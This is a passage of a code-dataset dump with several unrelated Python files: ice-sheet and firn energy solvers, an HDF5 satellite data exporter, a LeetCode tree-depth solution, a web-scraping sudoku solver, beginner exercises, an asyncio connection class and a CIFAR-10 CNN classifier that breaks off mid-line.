v.ds(s)*dsdy(s)) \\\n\t\t\t + 0.25*((u.ds(s)*dsdz(s))**2 + (v.ds(s)*dsdz(s))**2 \\\n\t\t\t + (+ (u.dx(s,1) + u.ds(s)*dsdy(s)) \\\n\t\t\t + (v.dx(s,0) + v.ds(s)*dsdx(s)))**2) \\\n\t\t\t + eps_reg)\n\n\t\tdef A_v(T):\n\t\t\treturn conditional(le(T,263.15),Bc*exp(-Qc/(Rc*T)),Bw*exp(-Qw/(Rc*T)))\n\n\t\tdef eta_v(s):\n\t\t\treturn A_v(T0.eval(s))**(-1./n)/2.*epsilon_dot(s)**((1.-n)/(2*n))\n\n\t\tdef w(s):\n\t\t\tw_0 = (U[0].dx(0) + U[1].dx(1))*(s-1.)\n\t\t\tw_2 = + (U[2].dx(0) + U[3].dx(1))*(s**(n+2) - s)/(n+1) \\\n\t\t\t + (n+2)/H*U[2]*(1./(n+1)*(s**(n+1) - 1.)*S.dx(0) \\\n\t\t\t - 1./(n+1)*(s**(n+2) - 1.)*H.dx(0)) \\\n\t\t\t + (n+2)/H*U[3]*(+ 1./(n+1)*(s**(n+1) - 1.)*S.dx(1) \\\n\t\t\t - 1./(n+1)*(s**(n+2) - 1.)*H.dx(1))\n\t\t\treturn (u(1)*B.dx(0) + v(1)*B.dx(1)) - 1./dsdz(s)*(w_0 + w_2)\n\n\t\tR_T = 0\n\n\t\tfor i in range(N_T):\n\t\t\t# SIGMA COORDINATE\n\t\t\ts = i/(N_T-1.0)\n\n\t\t\t# EFFECTIVE VERTICAL VELOCITY\n\t\t\tw_eff = u(s)*dsdx(s) + v(s)*dsdy(s) + w(s)*dsdz(s)\n\n\t\t\tif transient:\n\t\t\t\tw_eff += 1.0/H*(1.0 - s)*(H - H0)/dt\n\n\t\t\t# STRAIN HEAT\n\t\t\t#Phi_strain = (2*n)/(n+1)*2*eta_v(s)*epsilon_dot(s)\n\t\t\tPhi_strain = 4*eta_v(s)*epsilon_dot(s)\n\n\t\t\t# STABILIZATION SCHEME\n\t\t\t#Umag = sqrt(u(s)**2 + v(s)**2 + 1e-3)\n\t\t\t#tau = h/(2*Umag)\n\t\t\t#Psihat = Psi[i] + tau*(u(s)*Psi[i].dx(0) + v(s)*Psi[i].dx(1))\n\t\t\tUnorm = sqrt(u(s)**2 + v(s)**2 + DOLFIN_EPS)\n\t\t\tPe = Unorm*h/(2*kappa)\n\t\t\ttau = 1/tanh(Pe) - 1/Pe\n\t\t\tPsihat = Psi[i] + h*tau/(2*Unorm) * (+ u(s)*Psi[i].dx(0) \\\n\t\t\t + v(s)*Psi[i].dx(1) )\n\n\t\t\t# SURFACE BOUNDARY\n\t\t\tif i==0:\n\t\t\t\tR_T += Psi[i]*(T(i) - T_s)*dx\n\t\t\t# BASAL BOUNDARY\n\t\t\telif i==(N_T-1):\n\t\t\t\tR_T += (u(s)*T.dx(i,0) + v(s)*T.dx(i,1))*Psihat*dx\n\t\t\t\tR_T += -Phi_strain/(rho*Cp)*Psi[i]*dx\n\t\t\t\tR_T += -w_eff*q_geo/(rho*Cp*kappa*dsdz(s))*Psi[i]*dx\n\t\t\t\tf = (q_geo + beta*(u(s)**2 + v(s)**2))/(rho*Cp*kappa*dsdz(s))\n\t\t\t\tR_T += -2.*kappa*dsdz(s)**2*(+ (T(N_T-2) - T(N_T-1)) / deltax**2 \\\n\t\t\t\t - f/deltax)*Psi[i]*dx\n\t\t\t# INTERIOR\n\t\t\telse:\n\t\t\t\tR_T += -kappa*dsdz(s)**2.*T.d2s(i)*Psi[i]*dx\n\t\t\t\tR_T += w_eff*T.ds(i)*Psi[i]*dx\n\t\t\t\tR_T += (u(s)*T.dx(i,0) + v(s)*T.dx(i,1))*Psihat*dx\n\t\t\t\tR_T += -Phi_strain/(rho*Cp)*Psi[i]*dx\n\n\t\t\tif transient:\n\t\t\t\tdTdt = (T(i) - T0(i))/dt\n\t\t\t\tR_T += dTdt*Psi[i]*dx\n\n\t\t# PRETEND THIS IS LINEAR (A GOOD APPROXIMATION IN THE TRANSIENT CASE)\n\t\tself.R_T = replace(R_T, {T_:dT})\n\n\t\t# pressure melting point 
calculation, do not annotate for initial calc :\n\t\tself.Tm = as_vector([T_w - sigma*gamma*rho*g*H for sigma in sigmas])\n\t\tself.calc_T_melt(annotate=False)\n\n\tdef get_solve_params(self):\n\t\t\"\"\"\n\t\tReturns the solve parameters.\n\t\t\"\"\"\n\t\treturn self.solve_params\n\n\tdef default_ffc_options(self):\n\t\t\"\"\"\n\t\tReturns a set of default ffc options that yield good performance\n\t\t\"\"\"\n\t\t#ffc_options = {\"optimize\" : True,\n\t\t# \"eliminate_zeros\" : True,\n\t\t# \"precompute_basis_const\" : True,\n\t\t# \"precompute_ip_const\" : True}\n\t\tffc_options = {\"optimize\" : True}\n\t\treturn ffc_options\n\n\tdef default_solve_params(self):\n\t\t\"\"\"\n\t\tReturns a set of default solver parameters that yield good performance\n\t\t\"\"\"\n\t\tm_params = {'solver' : {'linear_solver': 'mumps'},\n\t\t 'ffc_params' : self.default_ffc_options()}\n\t\treturn m_params\n\n\tdef solve(self, annotate=False):\n\t\t\"\"\"\n\t\tSolves for hybrid energy.\n\t\t\"\"\"\n\t\ts = \"::: solving 'EnergyHybrid' for temperature :::\"\n\t\tprint_text(s, cls=self)\n\n\t\tmodel = self.model\n\n\t\t# SOLVE TEMPERATURE\n\t\tsolve(lhs(self.R_T) == rhs(self.R_T), model.T_,\n\t\t solver_parameters=self.solve_params['solver'],\n\t\t form_compiler_parameters=self.solve_params['ffc_params'],\n\t\t annotate=annotate)\n\t\tprint_min_max(model.T_, 'T_')\n\n\t\tif self.transient:\n\t\t\tmodel.T0_.assign(model.T_)\n\n\t\t# correct for pressure melting point :\n\t\tT_v = model.T_.vector().get_local()\n\t\tT_melt_v = model.Tm.vector().get_local()\n\t\tT_v[T_v > T_melt_v] = T_melt_v[T_v > T_melt_v]\n\t\tmodel.assign_variable(model.T_, T_v)\n\n\t\tout_T = model.T_.split(True) # deepcopy avoids projections\n\n\t\tmodel.assign_variable(model.Ts, out_T[0])\n\t\tmodel.assign_variable(model.Tb, out_T[-1])\n\n\t\t# update the melting temperature too :\n\t\tself.calc_T_melt(annotate=annotate)\n\n\tdef calc_T_melt(self, annotate=False):\n\t\t\"\"\"\n\t\tCalculates pressure-melting point in model.T_melt.\n\t\t\"\"\"\n\t\ts = \"::: calculating pressure-melting temperature :::\"\n\t\tprint_text(s, cls=self)\n\n\t\tmodel = self.model\n\n\t\tT_melt = project(self.Tm, solver_type='iterative', annotate=annotate)\n\n\t\tTb_m = T_melt.split(True)[-1] # deepcopy avoids projections\n\t\tmodel.assign_variable(model.T_melt, Tb_m)\n\t\tmodel.assign_variable(model.Tm, T_melt)\n\n\n\n\n\n\nclass EnergyFirn(Energy):\n\t\"\"\"\n\t\"\"\"\n\t# TODO: energy flux mode makes no sense here.\n\tdef initialize(self, model, momentum,\n\t solve_params = None,\n\t transient = False,\n\t use_lat_bc = False,\n\t energy_flux_mode = 'B_ring',\n\t reset = False):\n\t\t\"\"\"\n\t\t\"\"\"\n\t\ts = \"::: INITIALIZING FIRN ENERGY PHYSICS :::\"\n\t\tprint_text(s, cls=self)\n\n\t\tif type(model) != D1Model:\n\t\t\ts = \">>> FirnEnergy REQUIRES A 'D1Model' INSTANCE, NOT %s <<<\"\n\t\t\tprint_text(s % type(model) , 'red', 1)\n\t\t\tsys.exit(1)\n\n\t\t# save the solver parameters :\n\t\tself.solve_params = solve_params\n\n\t\tmesh = model.mesh\n\t\tQ = model.Q\n\n\t\tspy = model.spy\n\t\ttheta = model.theta # enthalpy\n\t\ttheta0 = model.theta0 # previous enthalpy\n\t\tT = model.T # temperature\n\t\trhof = model.rho # density of firn\n\t\tsigma = model.sigma # overburden stress\n\t\tr = model.r # grain size\n\t\tw = model.w # velocity\n\t\tm = model.m # mesh velocity\n\t\tdt = model.time_step # timestep\n\t\trho_i = model.rho_i # density of ice\n\t\trho_w = model.rho_w # density of water\n\t\tc_i = model.c_i # heat capacity of ice\n\t\tc_w = model.c_w # heat 
capacity of water\n\t\tk_w = model.k_w # thermal conductivity of water\n\t\tT = model.T\n\t\tT_w = model.T_w\n\t\tL_f = model.L_f\n\t\tthetasp = model.thetasp\n\t\tp = model.p\n\t\tetaw = model.etaw\n\t\trho_w = model.rho_w\n\t\t#w = w - m\n\t\tz = model.x[0]\n\t\tg = model.g\n\t\tS = model.S\n\t\th = model.h\n\t\t#W = model.W\n\t\tdx = model.dx\n\n\t\txi = TestFunction(Q)\n\t\tdtheta = TrialFunction(Q)\n\n\t\t# thermal conductivity parameter :\n\t\t#k_i = model.k_i*(rho / rho_i)**2\n\t\tk_i = 9.828 * exp(-0.0057*T)\n\n\t\t# water content :\n\t\tWm = conditional(lt(theta, c_i*T_w), 0.0, (theta - c_i*T_w)/L_f)\n\n\t\t# bulk properties :\n\t\tkb = k_w * Wm + (1-Wm)*k_i\n\t\tcb = c_w * Wm + (1-Wm)*c_i\n\t\trhob = rho_w * Wm + (1-Wm)*rhof\n\n\t\t# initialize energy :\n\t\tT_v = T.vector().get_local()\n\t\tmodel.assign_variable(theta, c_i(0)*T_v)\n\t\tmodel.assign_variable(theta0, c_i(0)*T_v)\n\n\t\t# boundary condition on the surface :\n\t\tself.thetaBc = DirichletBC(Q, model.theta_surface, model.surface)\n\n\t\t# Darcy flux :\n\t\tk = 0.077 * r**2 * exp(-7.8*rhob/rho_w) # intrinsic permeability\n\t\tphi = 1 - rhob/rho_i # porosity\n\t\tWmi = 0.0057 / (1 - phi) + 0.017 # irriducible water content\n\t\tSe = (Wm - Wmi) / (1 - Wmi) # effective saturation\n\t\tK = k * rho_w * g / etaw # saturated hydraulic cond.\n\t\tkrw = Se**3.0 # relative permeability\n\t\tpsi_m = p / (rho_w * g) # matric potential head\n\t\tpsi_g = z # gravitational potential head\n\t\tpsi = psi_m + psi_g # total water potential head\n\t\tu = - K * krw * psi.dx(0) # darcy water velocity\n\n\t\t# skewed test function in areas with high velocity :\n\t\tPe = (u+w)*h/(2*kb/(rhob*cb))\n\t\ttau = 1/tanh(Pe) - 1/Pe\n\t\txihat = xi + h*tau/2 * xi.dx(0)\n\n\t\t# enthalpy residual :\n\t\teta = 1.0\n\t\ttheta_mid = eta*theta + (1 - eta)*theta0\n\t\tdelta = + kb/(rhob*cb) * inner(theta_mid.dx(0), xi.dx(0)) * dx \\\n\t\t + (theta - theta0)/dt * xi * dx \\\n\t\t + (w + u) * theta_mid.dx(0) * xihat * dx \\\n\t\t - sigma * w.dx(0) / rhob * xi * dx\n\n\t\t# equation to be minimzed :\n\t\tself.J = derivative(delta, theta, dtheta) # jacobian\n\n\t\tself.delta = delta\n\t\tself.u = u\n\t\tself.Wm = Wm\n\t\tself.Wmi = Wmi\n\n\tdef get_solve_params(self):\n\t\t\"\"\"\n\t\tReturns the solve parameters.\n\t\t\"\"\"\n\t\treturn self.solve_params\n\n\tdef default_solve_params(self):\n\t\t\"\"\"\n\t\tReturns a set of default solver parameters that yield good performance\n\t\t\"\"\"\n\t\tparams = {'newton_solver' : {'relaxation_parameter' : 1.0,\n\t\t 'maximum_iterations' : 25,\n\t\t 'error_on_nonconvergence' : False,\n\t\t 'relative_tolerance' : 1e-10,\n\t\t 'absolute_tolerance' : 1e-10}}\n\t\tm_params = {'solver' : params}\n\t\treturn m_params\n\n\tdef solve(self, annotate=False):\n\t\t\"\"\"\n\t\t\"\"\"\n\t\ts = \"::: solving FirnEnergy :::\"\n\t\tprint_text(s, cls=self)\n\n\t\tmodel = self.model\n\n\t\t# newton's iterative method :\n\t\tsolve(self.delta == 0, model.theta, self.thetaBc, J=self.J,\n\t\t solver_parameters=self.solve_params['solver'],\n\t\t annotate=annotate)\n\n\t\tmodel.assign_variable(model.W0, model.W)\n\t\tmodel.assign_variable(model.W, project(self.Wm, annotate=False))\n\n\t\tT_w = model.T_w(0)\n\t\trho_w = model.rho_w(0)\n\t\trho_i = model.rho_i(0)\n\t\tg = model.g(0)\n\t\tc_i = model.c_i(0)\n\t\tthetasp = c_i * T_w\n\t\tL_f = model.L_f(0)\n\n\t\t# update coefficients used by enthalpy :\n\t\tthetap = model.theta.vector().get_local()\n\t\tthetahigh = np.where(thetap > thetasp)[0]\n\t\tthetalow = np.where(thetap < 
thetasp)[0]\n\n\t\t# calculate T :\n\t\tTp = thetap / c_i\n\t\tTp[thetahigh] = T_w\n\t\tmodel.assign_variable(model.T, Tp)\n\n\t\t# calculate dW :\n\t\tWp = model.W.vector().get_local()\n\t\tWp0 = model.W0.vector().get_local()\n\t\tdW = Wp - Wp0 # water content change\n\t\tmodel.assign_variable(model.dW, dW)\n\n\t\t# adjust the snow density if water is refrozen :\n\t\trho_v = model.rho.vector().get_local()\n\t\tfreeze = dW < 0\n\t\tmelt = dW > 0\n\t\trho_v[freeze] = rho_v[freeze] - dW[freeze] * model.rho_i(0)\n\t\tmodel.assign_variable(model.rho, rho_v)\n\n\t\t## calculate W :\n\t\t#model.assign_variable(model.W0, model.W)\n\t\t#Wp = model.W.vector().get_local()\n\t\t#Wp[thetahigh] = (thetap[thetahigh] - c_i*T_w) / L_f\n\t\t#Wp[thetalow] = 0.0\n\t\t#Wp0 = model.W0.vector().get_local()\n\t\t#dW = Wp - Wp0 # water content change\n\t\t#model.assign_variable(model.W, Wp)\n\t\t#model.assign_variable(model.dW, dW)\n\n\t\tprint_min_max(model.T, 'T')\n\t\tprint_min_max(model.theta, 'theta')\n\t\tprint_min_max(model.W, 'W')\n\n\t\tp = model.vert_integrate(rho_w * g * model.W)\n\t\tphi = 1 - model.rho/rho_i # porosity\n\t\tWmi = 0.0057 / (1 - phi) + 0.017 # irr. water content\n\t\tmodel.assign_variable(model.p, p)\n\t\tmodel.assign_variable(model.u, project(self.u, annotate=False))\n\t\tmodel.assign_variable(model.Smi, project(Wmi, annotate=False))\n\t\tprint_min_max(model.p, 'p')\n\t\tprint_min_max(model.u, 'u')\n\n\n\n","repo_name":"pf4d/cslvr","sub_path":"cslvr/energy.py","file_name":"energy.py","file_ext":"py","file_size_in_byte":53890,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"48"} +{"seq_id":"25117650141","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Feb 14 13:02:03 2022\n\n@author: pywrk\n\"\"\"\nimport sys\nimport h5py\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef applyLUT(count, lut):\n count_flt = count.flatten();\n output = np.zeros_like(count_flt, dtype=lut.dtype)\n for indx in range(count_flt.shape[0]): \n output[indx] = lut[count_flt[indx]]\n output = output.reshape(count.shape)\n return output;\n\ndef scaleDS(ds, ao, sf, fv):\n ds_flt = ds.flatten();\n output = np.zeros_like(ds_flt, dtype=sf.dtype)\n output = ds_flt*sf+ao\n output[ds_flt==fv]=-999.0\n\n output = output.reshape(ds.shape)\n return output\n \ndef dumpData(filename, out_dir):\n jobid = os.path.splitext(os.path.basename(filename))[0]\n\n out_path = out_dir + os.sep + jobid\n if not os.path.exists(out_path):\n os.mkdir(out_path)\n \n fid = h5py.File(filename, 'r')\n band_names=[\"IMG_TIR1\", \"IMG_TIR2\", \"IMG_MIR\", \"IMG_WV\", \"IMG_VIS\", \"IMG_SWIR\"]\n cal_ds_list = [\"IMG_TIR1_TEMP\", \"IMG_WV_TEMP\", \"IMG_TIR2_TEMP\", \"IMG_MIR_TEMP\", \"IMG_VIS_ALBEDO\"]\n \n for bname in band_names:\n count_ds = fid[bname][:];\n print(\"writing \" + bname)\n count_ds.tofile(out_path + os.sep + bname + \".bin\")\n for dsname in cal_ds_list:\n if dsname.startswith(bname):\n lut = fid[dsname][:]\n cal_ds = applyLUT(count_ds, lut) \n# plt.figure()\n# plt.imshow(cal_ds.squeeze())\n print(\"writing \" + dsname)\n cal_ds.tofile(out_path + os.sep + dsname +\".bin\")\n geo_ds_list=[\"Latitude\", \"Longitude\", \"Latitude_WV\", \"Longitude_WV\", \"Latitude_VIS\", \"Longitude_VIS\"]\n for dsname in geo_ds_list:\n ds = fid[dsname]\n fv = ds.attrs['_FillValue'][0]\n sf = ds.attrs['scale_factor'][0]\n ao = ds.attrs['add_offset'][0]\n scaled_ds = scaleDS(ds[:], ao, sf, fv)\n print(\"writing \" + dsname)\n scaled_ds.tofile(out_path + 
os.sep + dsname +\".bin\")\n \n fid.close()\n\nif __name__ == '__main__':\n if len(sys.argv) != 3:\n print(\"Usage: \" + sys.argv[0] + \" <h5_filename> <output_dir>
\")\n sys.exit(-1)\n \n filename = sys.argv[1]\n out_dir = sys.argv[2]\n# filename = \"/tmp/3DIMG_13FEB2020_0700_L1B_STD.h5\"\n# out_dir = \"/tmp/\"\n dumpData(filename, out_dir)\n \n ","repo_name":"1401muskan/IMDResearch","sub_path":"read_h5.py","file_name":"read_h5.py","file_ext":"py","file_size_in_byte":2404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43709378151","text":"'''\nGiven a binary tree, find its minimum depth.\nThe minimum depth is the number of nodes along the shortest path from the root node down to the nearest leaf node.\nNote: A leaf is a node with no children.\n\nExample:\nGiven binary tree [3,9,20,null,null,15,7],\n\n 3\n / \\\n 9 20\n / \\\n 15 7\nreturn its minimum depth = 2.\n'''\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\n# BFS\nclass Solution:\n def minDepth(self, root: TreeNode) -> int:\n if not root:\n return 0\n depth = 1\n ans = []\n \n stack = [root]\n while stack:\n level = []\n while stack:\n node = stack.pop()\n if node:\n if not node.left and not node.right:\n ans.append(depth)\n level += node.left, node.right\n stack = level[::-1]\n depth += 1\n print(ans)\n return min(ans)\n \n#DFS\nclass Solution:\n def minDepth(self, root: 'TreeNode') -> 'int':\n if root is None:\n return 0\n \n if root.left is None:\n return self.minDepth(root.right) +1\n if root.right is None:\n return self.minDepth(root.left) +1\n \n return min(self.minDepth(root.left), self.minDepth(root.right)) +1\n","repo_name":"SuperGuy10/LeetCode_Practice","sub_path":"Python/111. Minimum Depth of Binary Tree.py","file_name":"111. Minimum Depth of Binary Tree.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71475133267","text":"import requests\nimport urllib.request\nimport os\nfrom bs4 import BeautifulSoup\nimport re\n\n\nclass Board(object):\n def __init__(self, board):\n self.board = board\n\n decided_places = [[None for _ in range(9)] for _ in range(9)]\n candidates = [[[f'{i}' for i in range(1, 10)] for _ in range(9) ] for _ in range(9)]\n cnt = 0\n for i in range(9):\n for j in range(9):\n # print(i, j, 'value = ', self.board[i][j])\n if board[i][j] != '0':\n # candidates[i][j] = None\n candidates[i][j] = '0'\n decided_places[i][j] = board[i][j]\n cnt += 1\n # print(cnt) # 何箇所埋まっているか\n self.decided_places = decided_places\n self.candidates = candidates\n self.cnt = cnt\n\n # 2次元配列を転置する関数\n def transpose(self, x: list) -> list:\n row = len(x)\n col = len(x[0])\n tmp = [[['_'] for _ in range(row) ] for _ in range(col)]\n \n for i in range(row):\n for j in range(col):\n tmp[j][i] = x[i][j]\n \n return tmp\n\n # candidateが0は、既に決定していることを表す\n def delete_candidate(self):\n for i in range(9):\n for j in range(9):\n if self.decided_places[i][j]:\n for k in range(9):\n # print(self.candidates[i][k])\n if self.decided_places[i][j] in list(self.candidates[i][k]):\n if self.candidates[i][k] != '0':\n self.candidates[i][k].remove(self.decided_places[i][j])\n if self.decided_places[i][j] in list(self.candidates[k][j]):\n if self.candidates[k][j] != '0':\n self.candidates[k][j].remove(self.decided_places[i][j])\n row_block = i // 3\n colum_block = j // 3\n for l in range(3):\n for m in range(3):\n row = row_block * 3 + l\n colum = colum_block * 3 + m\n if self.decided_places[i][j] in list(self.candidates[row][colum]):\n if 
self.candidates[row][colum] != '0':\n self.candidates[row][colum].remove(self.decided_places[i][j])\n\n # 各要素に対して、候補が1なら決定する。\n def check_cand(self):\n for i in range(9):\n for j in range(9):\n # print(self.candidates[i][j])\n # print('len ',len(self.candidates[i][j]))\n if (self.candidates[i][j]) and (len(self.candidates[i][j]) == 1):\n if self.candidates[i][j] != '0':\n self.decided_places[i][j] = self.candidates[i][j][0]\n # self.candidates[i][j] = None\n self.candidates[i][j] = '0'\n self.cnt += 1\n \n # print(i,j) #確定させた場所のプリント\n\n # 各列、行、ブロックがその数字をもつかチェック\n def check_cand_by_num(self):\n\n # 各数字ごとにみていく\n for NUM in range(1, 10):\n # 各列と各行について\n for i in range(9):\n r = 0\n c = 0\n if str(NUM) in self.decided_places[i]:\n r += 1\n if r == 0:\n rr = []\n for j in range(9):\n if str(NUM) in self.candidates[i][j]:\n rr.append(j)\n if len(rr) == 1:\n self.candidates[i][rr[0]] = '0'\n self.decided_places[i][rr[0]] = str(NUM)\n self.cnt += 1\n\n cand_trans = self.transpose(self.candidates)\n det_trans = self.transpose(self.decided_places)\n if str(NUM) in det_trans[i]:\n c += 1\n if c == 0:\n cc = []\n for j in range(9):\n if str(NUM) in cand_trans[i][j]:\n cc.append(j)\n if len(cc) == 1:\n self.candidates[cc[0]][i] = '0'\n self.decided_places[cc[0]][i] = str(NUM)\n self.cnt += 1\n\n # 各ブロックについて\n for i in range(3):\n for j in range(3):\n # 各ブロック内での9個をチェック\n b = 0\n bb = []\n for l in range(3):\n for m in range(3):\n x = 3 * i + l\n y = 3 * j + m\n if self.decided_places[x][y] == str(NUM):\n b += 1\n if str(NUM) in self.candidates[x][y]:\n bb.append((x, y))\n if b == 0:\n if len(bb) == 1:\n x, y = bb[0]\n self.candidates[x][y] = '0'\n self.decided_places[x][y] = str(NUM)\n self.cnt += 1\n\n\ndef scraping_all_problem():\n defo_url = \"http://numberplace.net/\" \n # BeautifulSoupオブジェクト生成\n headers = {\"User-Agent\": \"Mozilla/5.0\"}\n ## これでurllib.error.HTTPErrorを解決できるかと思ったけど、無理でした。\n # headers = {\"User-Agent\": \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0\"}\n\n\n probs = []\n # 毎日20問あるらしいので、その問題を全て取ってくる\n # b = soup.find_all(\"table\", id='qlink')\n # print(b)\n for i in range(1, 21):\n url = defo_url + f'?no={i}'\n soup = BeautifulSoup(requests.get(\n url, headers=headers).content, 'html.parser')\n a = soup.find_all(\"script\", type=\"text/javascript\")\n str_html = str(a[0]) \n # print(str_html)\n prob = re.findall(r\"var toi = '([\\d]{81})'\", str_html)\n \n # 後で扱いやすいように整形してからappend\n probs.append(cut_prob(prob[0]))\n \n return probs\n\ndef cut_prob(x: str):\n # 81桁の数字(str)を9*9に1文字ずつ分割し、\n # それぞれstrの2次元配列で保存\n tmp = []\n for i in range(9):\n tmp.append(list(x[9*i:9*i+9]))\n return tmp\n\ndef print_initial(x: list):\n for y in x:\n tmp = ['_' if y[i] == '0' else y[i] for i in range(9)]\n print(tmp)\n\nif __name__ == '__main__':\n\n all_maps = scraping_all_problem()\n for i in range(20):\n maps = all_maps[i]\n # 初期boardの確認\n print(f'===== #{i+1} =====')\n print('----- initial board -----')\n print_initial(maps)\n\n\n board = Board(maps)\n\n # 解くPART\n while(board.cnt < 81):\n board.check_cand()\n board.delete_candidate()\n board.check_cand_by_num()\n\n \"\"\" プリントしながら確認したいとき\n for y in board.candidates:\n print(y)\n\n print('------------------')\n for x in board.decided_places:\n print(x\n \"\"\"\n print(board.cnt)\n\n # 最終MAPの表示\n print('----- final board -----')\n for x in board.decided_places:\n # print(''.join(x))\n 
print(x)\n\n","repo_name":"kokoichi206/su-doku","sub_path":"internet.py","file_name":"internet.py","file_ext":"py","file_size_in_byte":8304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30974398837","text":"#--------try 语句 一旦发现异常 接下来的不会被执行\ntry:\n sum = 1 + '1'\n f = open('文件.txt')\n print(f.read())\n#---------------如果出错应该怎么做\nexcept OSError as reason:\n print(\"文件出错了\\n错误的原因是:\"+ str(reason))\nexcept TypeError as reason:\n print(\"类型 出错了\\n错误的原因是:\"+ str(reason))\n\n #--------finally:无论如何都会被执行的代码\n \nfinally:\n f.close()\n\n\n #---------如何自己引出一个异常\nraise \n","repo_name":"jiangfeng123/pygame","sub_path":"每日任务/2019年11月13日/tese.py","file_name":"tese.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23670459872","text":"# Tipos de Datos\nintEx = int()\nintEx = 4324\n\nfloatEx = float()\nfloatEx = 3.14\n\nbooleEx = bool()\nbooleEx = True\n\nstrEx = str()\nstrEx = 'Miau'\nstrEx = \"Guau\"\n\n# Tipos de Operadores\n\na = 5 + 6\nb = 2 - 7\nc = 654 / 342\nd = 100 // 78\ne = 3534 % 234\nf = 2**5\n\n\n#print (-a, -b)\n\n\n# Precedencia\n\nprecTest = (5 + 2 * 3) // 3\n\n# Asosiatividad\n\nasocTest = 3 // 7 % 3\n\n# Conversion de datos\n\ncastTest = 555\n\nprint(type(castTest))\n\ncastTest = str(castTest)\n\nprint(type(castTest))\n\n# Entrada de datos:\n\ninputTest = input(\"Ingresa un str\")\n\n# cualquier cosa que no sea vacio será true\ninputTest2 = bool(input(\"Ahora ingresa un bool\"))\nprint(inputTest2)\n","repo_name":"gabiacuna/Ayudantias-IWI-131-2021-1","sub_path":"C1/ayudantia02.py","file_name":"ayudantia02.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41895955003","text":"import typing as t\nimport asyncio\nimport logging\n\nfrom .event import Event\nfrom .driver import Driver\nfrom .channel import Channel\nfrom .message_envelope import MessageEnvelope\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass Connection:\n def __init__(self, identity: int, name: str, driver: Driver, metadata: t.Dict[str, str]):\n self.identity = identity\n self.name = name\n self.driver = driver\n self.metadata = metadata\n\n self._channels: t.Dict[Channel] = {}\n self._lock_channels = asyncio.Lock()\n self.driver.channel_added += self.add_channel\n self.driver.message_received += self.route_message\n\n def __repr__(self):\n return f''\n\n async def add_channel(self, channel: Channel):\n logger.info(f'Adding {channel}...')\n async with self._lock_channels:\n self._channels[channel.identity] = channel\n logger.info(f'Added {channel} to {self}')\n\n async def get_channels(self):\n logger.info('Waiting for lock to be able to get them channels')\n async with self._lock_channels:\n return list(self._channels.values())\n\n async def route_message(self, message_envelope: MessageEnvelope):\n async with self._lock_channels:\n channel = self._channels.get(message_envelope.channel_id)\n if channel is None:\n logger.error(f'Got message with unknown channel {message_envelope.channel_id}')\n return\n await channel.add_message(message_envelope.message)\n","repo_name":"eblade/attic","sub_path":"mess/connection.py","file_name":"connection.py","file_ext":"py","file_size_in_byte":1561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"483700763","text":"# A simple CNN classifier\nimport tensorflow 
as tf\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n# TODO review parameters nodes of the NN \n\n\"\"\"\nDATA LOADING\n\"\"\"\n\n(train_set, train_label),(test_set, test_label) = tf.keras.datasets.cifar10.load_data()\nclass_names = ['airplane', 'automobile', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck']\n\nimg_height = len(train_set[0][0])\nimg_width = len(train_set[0][0])\n\n\n\"\"\"\nFUNCTIONS \n\"\"\"\n\ndef plot_sample(images, labels):\n \"\"\"Plot utils.\"\"\"\n plt.figure(figsize=(10,10))\n for i in range(36):\n plt.subplot(6, 6, i+1)\n plt.xticks([])\n plt.yticks([])\n plt.imshow(images[i], cmap=plt.cm.binary)\n plt.xlabel(class_names[labels[i]])\n plt.show()\n\n\ndef plot_metrics(history, metric:str, title:str):\n x = range(1, len(history.history[metric])+1)\n yt = history.history[metric]\n yv = history.history['val_'+ metric]\n plt.plot(x, yt, label='Training ' + metric)\n plt.plot(x, yv, label='Validation ' + metric)\n plt.xlabel('Epoch')\n plt.ylabel(metric)\n plt.ylim([0,1])\n plt.title(title)\n plt.legend()\n plt.show()\n\n\ndef image_classifier():\n model = tf.keras.models.Sequential()\n model.add(tf.keras.layers.Rescaling(1/255., input_shape=(img_width, img_height, 3)))\n model.add(tf.keras.layers.Flatten())\n model.add(tf.keras.layers.Dense(64, activation='relu'))\n model.add(tf.keras.layers.Dense(len(class_names), activation='softmax'))\n \n return model \n\n\ndef image_cnn_classifier():\n model = tf.keras.models.Sequential()\n model.add(tf.keras.layers.Rescaling(1/255., input_shape=(img_width, img_height, 3)))\n model.add(tf.keras.layers.Conv2D(16, 3, padding='valid', activation='relu'))\n model.add(tf.keras.layers.MaxPooling2D())\n model.add(tf.keras.layers.Conv2D(32, 3, padding='valid', activation='relu'))\n model.add(tf.keras.layers.MaxPooling2D())\n model.add(tf.keras.layers.Conv2D(64, 3, padding='valid', activation='relu'))\n model.add(tf.keras.layers.MaxPooling2D())\n model.add(tf.keras.layers.Flatten())\n model.add(tf.keras.layers.Dense(64, activation='relu'))\n model.add(tf.keras.layers.Dense(len(class_names), activation='softmax'))\n\n return model\n\n\"\"\"\nMAIN \n\"\"\"\n\ndef main():\n\n # Plot a sample of images\n plot_sample(train_set, train_label.flatten())\n # Simple model \n model1 = image_classifier()\n model1.compile(optimizer='adam',loss='sparse_categorical_crossentropy', metrics=['accuracy'])\n history1 = model1.fit(train_set, train_label, validation_data=[test_set, test_label], epochs=10)\n test_loss, test_accuracy = model1.evaluate(test_set, test_label)\n print(\"Test 